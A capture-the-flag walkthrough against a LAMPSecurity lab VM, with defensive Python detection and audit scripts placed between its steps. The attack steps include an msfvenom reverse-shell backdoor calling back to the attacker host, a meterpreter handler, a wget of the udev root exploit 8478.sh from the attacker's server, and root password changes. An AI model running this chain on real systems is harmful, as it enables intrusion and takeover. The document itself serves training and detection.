The LAMPSecurity project is an effort to
produce training and benchmarking tools that can be used to educate information
security professionals and test products. Please note there are other capture
the flag exercises too.
These exercises can be used for training
purposes by following this documentation. Alternatively, you may wish to test
new tools, using the CTF virtual machines as targets. This is especially
helpful in evaluating the effectiveness of vulnerability discovery or
penetration testing tools.
Download from Here.
Penetration Testing Methodology
- Network Scanning
  - netdiscover
  - nmap port scan
- Enumeration
  - Performing directory brute force
  - Exploring directories to find the username and password
- Exploiting
  - Using a backdoor
  - Using netcat/msfconsole
- Privilege Escalation
  - Changing the password of root and other users
Walkthrough
Network Scanning
The first step is to identify the target on the network. To do so, we use the following command:
netdiscover
Now we use nmap to identify the open ports and the services running on the target machine, with the following command:
nmap -sV -sT -p- 192.168.43.30
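The defender's counterpart to this scan is an exposure check: parse the nmap output and compare the open ports against the set the host is actually meant to expose. The Python below is an added example, not part of the walkthrough or the LAMPSecurity project; the nmap output is a constructed sample in nmap's normal output format (not the real scan of the VM), and the EXPECTED_PORTS baseline is an assumption about the host.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of nmap "normal" output for a LAMP-style host. It is not
# the page's real scan result; ports and version strings are illustrative.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.43.30
Host is up (0.00043s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.3 ((CentOS))
111/tcp  open  rpcbind 2 (RPC #100000)
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.2.3 ((CentOS))
Nmap done: 1 IP address (1 host up) scanned in 31.52 seconds
"""

# One port line: "<port>/<proto> <state> <service> [<version>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)

# Assumed baseline for this host: only these ports are meant to be reachable.
EXPECTED_PORTS: Set[Tuple[str, int]] = {("tcp", 22), ("tcp", 80)}


def parse_nmap(text: str) -> List[Dict[str, object]]:
    """Turn nmap normal output into a list of service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner, header and summary lines are skipped
        services.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return services


def unexpected_exposure(services, expected=EXPECTED_PORTS):
    """Open ports that are not in the approved baseline."""
    return [s for s in services
            if s["state"] == "open" and (s["proto"], s["port"]) not in expected]


def exposure_report(text: str) -> List[str]:
    """Human-readable findings: one line per unexpected open port."""
    return [f"{s['port']}/{s['proto']} {s['service']} {s['version']}".rstrip()
            for s in unexpected_exposure(parse_nmap(text))]


if __name__ == "__main__":
    for line in exposure_report(SAMPLE_NMAP_OUTPUT):
        print("unexpected:", line)
```

Feeding it a real `nmap -sV` normal-output file (for example via `nmap -oN scan.txt ...`) and a baseline per host turns the same scan the walkthrough uses into a repeatable check that a database port or a second web listener has not quietly appeared.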
Enumeration
Next, we enumerate the host. We open a web browser to explore the services; the target hosts a web application, so let's explore it:
http://192.168.43.30
Next, let's look for hidden files and directories. Discovering files and directories can reveal useful information such as usernames, passwords or configuration files. We use the following command:
dirb http://192.168.43.30
We found two notable directories, /files/ and /sql/. Their names suggest they are worth a closer look.
Our next step is to explore these two directories. We could also explore the other directories found, but they do not seem useful for us.
http://192.168.43.30/files/
Browsing the files/ directory, we found multiple useful files with a lot of information, as shown in the image below:
http://192.168.43.30/sql/db.sql/
Browsing the sql/ directory, we found db.sql; opening it gives us all the information about the database, including a username and password, as shown in the image below:
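Every finding in this step (a browsable upload directory, a SQL dump sitting under the web root, plain-text credentials inside it) is something the site owner can detect before an attacker does. The Python below is an added example, not code from the walkthrough or the LAMPSecurity project: it audits a document root for listable directories (no index file), files with extensions that should never be served, and credential-looking content. It builds a constructed sample web root in a temporary directory that mirrors the layout above (files/, sql/db.sql); the extension list, the credential patterns and the inc/config.php file are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# File types that should never sit under a served document root (assumed list).
SENSITIVE_SUFFIXES = {".sql", ".bak", ".old", ".orig", ".swp", ".env", ".tar", ".gz", ".zip"}
# A directory without one of these is listable when the server has Indexes on.
INDEX_FILES = {"index.php", "index.html", "index.htm"}
# Crude credential patterns: a quoted password assignment, or an INSERT into a users table.
CRED_PATTERNS = [
    re.compile(r"(?i)pass(word)?\s*[=:]\s*['\"][^'\"]+['\"]"),
    re.compile(r"(?i)insert\s+into\s+\S*user\S*"),
]


def audit_webroot(root: Path) -> List[Tuple[str, str]]:
    """Walk a document root and return sorted (finding_type, relative_path) pairs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if not INDEX_FILES.intersection(filenames):
            findings.append(("listable-directory", rel_dir))
        for name in filenames:
            path = Path(dirpath) / name
            rel = os.path.relpath(path, root)
            if path.suffix.lower() in SENSITIVE_SUFFIXES:
                findings.append(("sensitive-extension", rel))
            try:
                text = path.read_text(errors="ignore")
            except OSError:
                continue  # unreadable file: skip content checks, keep going
            if any(p.search(text) for p in CRED_PATTERNS):
                findings.append(("credential-material", rel))
    return sorted(findings)


def build_sample_webroot() -> Path:
    """Constructed web root mirroring the walkthrough's layout (not the VM's real files)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text("<?php echo 'home'; ?>\n")
    (root / "files").mkdir()                       # upload directory, no index file
    (root / "files" / "notes.txt").write_text("meeting notes\n")
    (root / "sql").mkdir()                         # forgotten database dump
    (root / "sql" / "db.sql").write_text(
        "CREATE TABLE users (id int, username varchar(32), password varchar(32));\n"
        "INSERT INTO users VALUES (1, 'admin', 'adminpass');\n"
    )
    (root / "inc").mkdir()                         # assumed include dir with a config file
    (root / "inc" / "config.php").write_text("<?php $db_pass = 'adminpass'; ?>\n")
    return root


if __name__ == "__main__":
    for kind, rel in audit_webroot(build_sample_webroot()):
        print(f"{kind:22} {rel}")
```

Run against a real document root (`audit_webroot(Path("/var/www/html"))`), the three finding types map directly onto fixes: move dumps and backups outside the web root, add an index file or disable directory indexes, and keep credentials in files the web server cannot serve.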
Now let's try to log in to the admin panel using the username 'admin' and the password 'adminpass'.
The login succeeds. We now have the admin panel, from which we can manage the web application. Let's see if we can add pages to the application so that we can upload a PHP backdoor.
Since we can add a new event, we first create a backdoor with msfvenom and then upload the resulting shell.php file to the website. To create the shell, type:
msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248
After this, upload the shell by adding a new
event as shown in the image below:
Finally, we have uploaded a malicious file. Now we will use msfconsole (or netcat) to get a session, in order to perform more operations and gain root access.
So, to access the ‘shell.php’ we will explore
the directory URL: http://192.168.43.30/files/
Now let's fire up msfconsole and type in the following commands to get a session:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.248
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit
Press enter after typing 'exploit', go back to the URL http://192.168.43.30/files/ and click on 'shell.php'. Returning to msfconsole, we can see that we have a session.
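On the server side, the whole chain just described leaves a distinctive trace in the web server access log: a POST to the admin panel from one client, followed shortly by a request for a .php file inside the upload directory. The Python below is an added example, not part of the walkthrough or the LAMPSecurity project, of detection logic for that pattern run over constructed Apache log lines (not captured from the VM). The /admin/events.php path, the /files/ upload directory and the five-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Apache common-log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed layout: /files/ is the directory uploads are served from and /admin/
# is the panel used to add events (placeholder paths, not the CTF app's own).
UPLOAD_DIRS = ("/files/",)
ADMIN_PREFIX = "/admin/"
# Server-side script extensions, including double extensions such as shell.php.jpg.
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

# Constructed log lines (not captured from the VM): an admin POST followed by a
# request for a PHP file under /files/, plus benign traffic from another host.
SAMPLE_LOG = """\
192.168.43.248 - - [10/Mar/2020:14:02:11 +0000] "GET /index.php HTTP/1.1" 200 2312
192.168.43.248 - - [10/Mar/2020:14:02:40 +0000] "POST /admin/events.php?action=add HTTP/1.1" 302 -
192.168.43.248 - - [10/Mar/2020:14:03:05 +0000] "GET /files/ HTTP/1.1" 200 845
192.168.43.248 - - [10/Mar/2020:14:03:09 +0000] "GET /files/shell.php HTTP/1.1" 200 -
192.168.43.77 - - [10/Mar/2020:14:10:00 +0000] "GET /files/agenda.pdf HTTP/1.1" 200 10422
"""


def parse_log(text: str) -> List[Dict[str, object]]:
    """Parse access-log lines into records; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entries.append({
            "ip": m.group("ip"),
            "ts": datetime.strptime(m.group("ts"), TS_FMT),
            "method": m.group("method"),
            "path": m.group("path").split("?", 1)[0],
            "query": m.group("path").partition("?")[2],
            "status": int(m.group("status")),
        })
    return entries


def executable_in_upload_dir(entries) -> List[Dict[str, object]]:
    """Rule 1: any request for a server-side script inside an upload directory."""
    return [e for e in entries
            if e["path"].startswith(UPLOAD_DIRS) and EXEC_EXT.search(e["path"])]


def upload_then_execute(entries, window=timedelta(minutes=5)) -> List[Tuple[str, str, str]]:
    """Rule 2: the same client POSTs to the admin panel and then fetches a script
    from an upload directory within `window`. Returns (ip, post_path, script_path)."""
    hits = []
    scripts = executable_in_upload_dir(entries)
    for post in entries:
        if post["method"] != "POST" or not post["path"].startswith(ADMIN_PREFIX):
            continue
        for s in scripts:
            if s["ip"] == post["ip"] and post["ts"] <= s["ts"] <= post["ts"] + window:
                hits.append((post["ip"], post["path"], s["path"]))
    return hits


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    for e in executable_in_upload_dir(log):
        print("script in upload dir:", e["ip"], e["path"])
    for ip, post, script in upload_then_execute(log):
        print("upload->execute chain:", ip, post, "->", script)
```

Rule 1 alone is worth alerting on: an upload directory should be served with script execution disabled, so any request for a .php file there indicates either a misconfiguration or a webshell. Rule 2 adds the admin-panel context that distinguishes the walkthrough's upload path from a stray file.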
Now that we have a session, let's run the 'sysinfo' command to find the kernel version and architecture:
sysinfo
The kernel version is 2.6.18-92.el5.
Researching this kernel version shows that it is vulnerable to the udev exploit.
Now we will use a script to gain root access. The script is 8478.sh, and the exploit code is available on our Kali Linux OS. Let's copy this file to the directory where we created our backdoor, /root/Music, using the cp command:
cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music
cd /root/Music/
ls -l
Now let's run a simple HTTP server using python so that we can download this file onto the target system:
python -m SimpleHTTPServer
Now let's drop into a shell on the target system from the same meterpreter session:
shell
This is a very limited shell, and with it we cannot perform privilege escalation. To obtain a more capable shell, we use python's pty module with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
Now we have a shell where we can try different commands to gain root access. First, let's change to the /tmp directory using the cd command:
cd /tmp
pwd
Now we download the 8478.sh file here so that we can exploit the system, using the wget command:
wget http://192.168.43.248:8000/8478.sh -q
Now make the script executable using the chmod command:
ls
chmod +x 8478.sh
It's time to run the script and gain root access; run it using './8478.sh':
./8478.sh
Many of us will get an error here. After searching for this error, we found that it is resolved by stripping the carriage-return (Windows-style) line endings from the script with the following command:
sed -i -e 's/\r$//' 8478.sh
Try again to run the script using:
./8478.sh
The reason for this error is that the script requires some experimentation: you have to provide the proper PID for the code to work. So we have to find the right PID and run the script with it. To find the PID, run the following command:
cat /proc/net/netlink
Run the script again using the PID 376 using
the command below:
./8478.sh 376
whoami
Boom! We have gained the root access!
Let's do some more operations. Head into the /home directory using cd /home and look for other users there. As root, we can change any user's password with passwd john; similarly, we can change the root password with the same command:
passwd root
id
su john
su -l
ls
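The final commands of the walkthrough (passwd for root and john, su into both accounts) are exactly the events a host's authentication log records, and they are the cheapest place for a defender to catch a compromise that started as a web shell. The Python below is an added example, not part of the walkthrough or the LAMPSecurity project: it runs two rules over constructed /var/log/secure lines in the pam_unix format CentOS uses (not real log output from the VM). The service-account list and the host name "ctf" are assumptions.

```python
import re
from typing import List, Tuple

# Accounts that should never be the "by" side of an su (assumed list).
SERVICE_ACCOUNTS = {"apache", "www-data", "nobody", "mysql"}

# pam_unix messages as written to /var/log/secure on a CentOS-style host.
PASSWD_RE = re.compile(
    r"passwd: pam_unix\(passwd:chauthtok\): password changed for (?P<user>\S+)"
)
SU_RE = re.compile(
    r"su: pam_unix\(su(?:-l)?:session\): session opened for user (?P<target>\S+) "
    r"by (?P<actor>[^(\s]+)\(uid=(?P<uid>\d+)\)"
)

# Constructed log lines (not from the VM): password changes for root and john,
# su to both users from the web server account, and one ordinary admin su later.
SAMPLE_SECURE = """\
Mar 10 14:05:31 ctf passwd: pam_unix(passwd:chauthtok): password changed for root
Mar 10 14:05:48 ctf passwd: pam_unix(passwd:chauthtok): password changed for john
Mar 10 14:06:02 ctf su: pam_unix(su:session): session opened for user john by apache(uid=48)
Mar 10 14:06:40 ctf su: pam_unix(su-l:session): session opened for user root by apache(uid=48)
Mar 10 15:00:00 ctf sshd[2211]: Accepted publickey for john from 192.168.43.10 port 50112 ssh2
Mar 10 15:01:12 ctf su: pam_unix(su-l:session): session opened for user root by john(uid=500)
"""


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule, detail) alerts in log order.

    Rule A: every password change is recorded; a change of root's password is
            its own, higher-severity rule.
    Rule B: an su session opened *by* a service account (the web server user
            should never become anyone else).
    """
    alerts = []
    for line in lines:
        m = PASSWD_RE.search(line)
        if m:
            user = m.group("user")
            rule = "root-password-changed" if user == "root" else "password-changed"
            alerts.append((rule, user))
            continue
        m = SU_RE.search(line)
        if m and m.group("actor") in SERVICE_ACCOUNTS:
            alerts.append(("service-account-su", f"{m.group('actor')}->{m.group('target')}"))
    return alerts


def detect_text(text: str) -> List[Tuple[str, str]]:
    """Convenience wrapper for a whole log file read into a string."""
    return detect(text.splitlines())


if __name__ == "__main__":
    for rule, detail in detect_text(SAMPLE_SECURE):
        print(f"{rule:22} {detail}")
```

The john-to-root su at the end is deliberately left unflagged: an administrator elevating from their own account is normal, whereas the web server's uid appearing as the actor in any su line is not, regardless of which exploit put it there.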